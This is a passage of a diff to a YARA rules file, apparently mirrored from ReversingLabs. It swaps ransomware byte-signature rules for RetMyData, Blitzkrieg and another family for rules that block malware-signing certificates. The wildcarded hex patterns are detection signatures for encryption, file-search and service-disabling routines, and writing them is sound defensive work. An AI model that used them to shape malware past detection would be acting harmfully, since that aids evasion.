E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 40 ?? 8B 00 8B 00 - 89 85 ?? ?? ?? ?? 8A 94 3D ?? ?? ?? ?? 8A 84 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 85 - ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 - ?? ?? ?? ?? E8 - } - $raw_socket_connection_1_4 = { - 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B - 00 50 E8 ?? ?? ?? ?? 40 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? - ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? 8B 00 - 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B 00 50 E8 - } - $raw_socket_connection_1_5 = { - C6 85 ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? - ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 66 - 8B 85 ?? ?? ?? ?? 8B D0 66 81 E2 ?? ?? 88 95 ?? ?? ?? ?? 0F B7 C0 C1 E8 ?? 88 85 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? - ?? ?? 40 74 ?? B3 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? - ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 - 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? - ?? ?? ?? C3 - } - $file_search_1_1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 C3 85 DB 74 - ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74 ?? 8B 45 ?? 50 8D - 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 80 38 ?? 75 ?? - 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 - } - $file_search_1_2 = { - 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? - ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6 8B D0 - 03 D3 42 81 FA ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 40 50 56 8D 85 ?? ?? ?? ?? 03 C3 50 E8 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 - } - $file_search_1_3 = { - 8B F0 83 FE ?? 74 ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 53 ?? - 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3 48 50 8D - 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85 ?? ?? ?? - ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 - } - $raw_socket_connection_2 = { - 55 8B EC 83 C4 ?? 53 56 8B F2 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? - ?? 64 FF 30 64 89 20 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 8D 45 ?? - 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8B C6 86 E0 66 89 45 ?? 8B 45 - ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B C3 E8 - ?? ?? ?? ?? 83 CB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? - C3 - } - condition: - uint16(0)==0x5A4D and (($http_connection_1 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3 and $raw_socket_connection_1_1 and $raw_socket_connection_1_2 and $raw_socket_connection_1_3 and $raw_socket_connection_1_4 and $raw_socket_connection_1_5) or ($raw_socket_connection_2 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dening Hu" and pe.signatures[i].serial=="6d:c8:6e:bf:58:63:56:8e:22:37:b2:d8:95:82:d7:05" and 1471305600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Retmydata : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_214Df59Fe53874Cc011Dd45727035F51 : INFO FILE { meta: - description = "Yara rule that detects RetMyData ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f7a091d9-7ace-5aad-95b4-d5101fa7fdea" - date = "2020-07-15" - modified = "2020-07-15" + id = "9265bb94-b183-523f-91bf-9bc76ab63d6b" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.RetMyData.yara#L1-L79" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "54ce38d75e9ab82a77b9c338f75e180e19ac745f149289c7478a4aa3b44d70fd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16044-L16060" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "96269f41f82621aee029f343acfce70c781bf7713588dfe78fac35a3d1d3f7cd" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "RetMyData" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 9D ?? ?? ?? ?? 8B 04 04 - C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 40 51 51 0F 84 ?? ?? ?? ?? 8D - B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85 - C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ?? - ?? ?? 89 74 24 ?? 89 7C 24 ?? 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? - 89 D8 E8 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? BA ?? ?? - ?? ?? 89 D8 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 D8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 - 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 0F 85 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F 5D C3 55 BA ?? ?? ?? ?? 89 - E5 53 51 89 C3 E8 ?? ?? ?? ?? 48 74 ?? 5A 89 D8 5B 5D E9 ?? ?? ?? ?? 58 5B 5D C3 - } - $enum_resources = { - 55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 95 ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? 8B 04 04 C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ?? - ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? - 83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 31 F6 89 - 44 24 ?? 8D 85 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? - ?? ?? ?? 83 EC ?? 3B B5 ?? ?? ?? ?? 7D ?? 83 7B ?? ?? 75 ?? 8B 43 ?? C7 44 24 ?? ?? - ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F8 E8 ?? ?? ?? ?? 89 D8 46 83 C3 ?? - E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F - 5D C3 - } - $encrypt_files = { - 55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 - C0 89 C2 A3 ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31 - C0 89 D7 F3 AB 85 DB 75 ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? - ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 5C 24 ?? 8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 3C - 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C - 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 - 24 E8 ?? ?? ?? ?? 89 74 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 EC - ?? 83 F8 ?? 89 C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 89 7C 24 ?? 89 34 24 EB ?? 8D - BD ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? - ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 89 - 1C 24 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 - ?? ?? ?? ?? EB ?? F7 D8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? - 89 1C 24 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 EC ?? BA ?? ?? ?? ?? C7 04 24 ?? ?? ?? - ?? B8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 - 74 24 ?? 89 1C 24 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 EC ?? - FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 - } - condition: - uint16(0)==0x5A4D and ($enum_resources) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="21:4d:f5:9f:e5:38:74:cc:01:1d:d4:57:27:03:5f:51" and 1468800000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Blitzkrieg : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_37Ca4F66Fdcc8732992723199859886C : INFO FILE { meta: - description = "Yara rule that detects Blitzkrieg ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "078f7f9d-edd4-52b4-a30e-e968542da95c" - date = "2020-07-15" - modified = "2020-07-15" + id = "9dd87769-73d0-5299-b6ed-936703abc78e" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Blitzkrieg.yara#L1-L127" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "22dd16c886a1982186fe927e633be9951da7d7e664e877e11fa976696b2bc86f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16062-L16078" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "190dffc36c17c27c43337d7914683b7bab3ff18a50de5278ed2a66f04b9e395d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Blitzkrieg" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? - 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? - ?? 64 FF 30 64 89 20 8B 45 ?? 8B 40 ?? 8B 10 FF 52 ?? 8B F0 4E 83 FE ?? 0F 8C ?? ?? - ?? ?? 8B 45 ?? 8B 48 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 A0 ?? ?? ?? ?? 88 - 43 ?? C6 43 ?? ?? 8D 4D ?? 8B 45 ?? 8B 40 ?? 8B D6 8B 38 FF 57 ?? 8B 55 ?? 8B C3 E8 - ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3 - 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4B ?? 89 0C - 82 4E 83 FE ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 84 C0 74 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $search_files_p1 = { - E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? B2 ?? A1 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? F6 40 ?? ?? 74 ?? FF 45 ?? 8B 45 ?? F6 40 - ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? - 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 52 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? - E8 ?? ?? ?? ?? 85 C0 7E ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 8B 52 ?? - 48 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 40 80 7C 02 ?? ?? 74 ?? 8D 85 ?? ?? ?? - ?? 8B 55 ?? 8B 4D ?? 8B 49 ?? 4A 85 C9 74 ?? 3B 51 ?? 72 ?? E8 ?? ?? ?? ?? 42 8A 54 - 11 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 55 ?? 8B 45 - ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 45 ?? FF 4D ?? 75 ?? 8B 45 ?? 8B 10 FF - 52 ?? 48 85 C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - 8B 55 ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? - ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55 - ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 - ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ?? - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? - ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 55 ?? B8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 85 C0 7F ?? 8B 45 ?? 8B 40 ?? 50 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B D8 B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 - } - $search_files_p2 = { - E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 8B 4B - ?? 89 0C 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8B - 45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 - 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? - EB ?? FF 45 ?? FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? - 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 85 ?? ?? ?? ?? - 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? - 8B 48 ?? 8B 45 ?? E8 - } - $disable_services_p1 = { - E8 ?? ?? ?? ?? 8B F0 BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 - FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA - ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? - 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 - FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA - ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? - 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 - FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA - ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? - 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 - FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA - ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? - 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 - FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA - ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA - } - $disable_services_p2 = { - 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 - FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA - ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? - 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 - FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA - ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? - 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 - FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA - ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? - 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 - FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA - ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 6A ?? 8B 45 ?? E8 ?? - ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 C9 33 D2 E8 ?? ?? ?? ?? 33 C0 5A - 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Aleman Ltd" and pe.signatures[i].serial=="37:ca:4f:66:fd:cc:87:32:99:27:23:19:98:59:88:6c" and 1505952000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Be2F22C152Bb218B898C4029056816A9 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "d5ca9d9d-e80f-56c1-90b7-ef931e61ba92" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16080-L16098" + license_url = 